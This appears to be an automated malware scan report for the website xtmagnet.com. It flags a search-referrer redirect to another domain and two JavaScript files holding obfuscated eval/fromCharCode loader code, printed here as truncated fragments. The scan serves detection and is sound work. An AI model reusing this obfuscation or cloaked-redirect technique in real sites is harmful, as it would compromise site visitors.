Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.xtmagnet.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.xtmagnet.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Object moved Cache-Control: private Date: Thu, 25 Sep 2014 03:34:26 GMT Location: http://zubawang.com/?www.xtmagnet.com Server: Microsoft-IIS/8.0 Content-Length: 158 Content-Type: text/html Set-Cookie: ASPSESSIONIDCABRDCQQ=HDPHJPJBFJGGIGMFDIKAJCPO; path=/ X-Powered-By: ASP.NET | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.xtmagnet.com/ | 200 OK Content-Length: 53410 Content-Type: text/html | clean |
http://www.xtmagnet.com/ps.js | 200 OK Content-Length: 8528 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) OlOlll="(x)";OllOlO=" String";OlllOO="tion";OlOllO="Code(x)}";OllOOO="Char";OlllOl="func";OllllO=" l = ";OllOOl=".from";OllOll="{return";Olllll="var";eval(Olllll+OllllO+OlllOl+OlllOO+OlOlll+OllOll+OllOlO+OllOOl+OllOOO+OlOllO);eval(l(79)+l(61)+l(102)+l(117)+l(110)+l(99)+l(116)+l(105)+l(111)+l(110)+l(40)+l(109)+l(41)+l(123)+l(114)+l(101)+l(116)+l(117)+l(114)+l(110)+l(32)+l(83)+l(116)+l(114)+l(105)+l(110)+l(103)+l(46)+l(102)+l(114)+l(111)+l(109)+l(67)+l(104)+l(97)+l(114)+l(67)+l(111)+l(100)+l(101)+ Antivirus reports:
| ||
http://www.xtmagnet.com/js/ajax.js | 200 OK Content-Length: 15948 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) OlOlll="(x)";OllOlO=" String";OlllOO="tion";OlOllO="Code(x)}";OllOOO="Char";OlllOl="func";OllllO=" l = ";OllOOl=".from";OllOll="{return";Olllll="var";eval(Olllll+OllllO+OlllOl+OlllOO+OlOlll+OllOll+OllOlO+OllOOl+OllOOO+OlOllO);eval(l(79)+l(61)+l(102)+l(117)+l(110)+l(99)+l(116)+l(105)+l(111)+l(110)+l(40)+l(109)+l(41)+l(123)+l(114)+l(101)+l(116)+l(117)+l(114)+l(110)+l(32)+l(83)+l(116)+l(114)+l(105)+l(110)+l(103)+l(46)+l(102)+l(114)+l(111)+l(109)+l(67)+l(104)+l(97)+l(114)+l(67)+l(111)+l(100)+l(101)+ Antivirus reports:
| ||
http://js.users.51.la/17139226.js | 200 OK Content-Length: 1930 Content-Type: application/x-javascript | clean |
http://bb.5599bb.com/js/q.gif | 200 OK Content-Length: 116 Content-Type: image/gif | clean |
http://bb.5599bb.com/js/q2-sj.js | 200 OK Content-Length: 1013 Content-Type: application/x-javascript | clean |
http://bb.5599bb.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.xtmagnet.com/js/jquery.js | 200 OK Content-Length: 91796 Content-Type: application/javascript | clean |
http://www.xtmagnet.com/js/selectivizr.js | 200 OK Content-Length: 4836 Content-Type: application/javascript | clean |
http://www.xtmagnet.com/js/prettyphoto.js | 200 OK Content-Length: 24867 Content-Type: application/javascript | clean |
http://www.xtmagnet.com/js/onload.js | 200 OK Content-Length: 14295 Content-Type: application/javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xtmagnet.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://xtmagnet.com/
Result: xtmagnet.com is not infected or malware details are not published yet.
Result: xtmagnet.com is not infected or malware details are not published yet.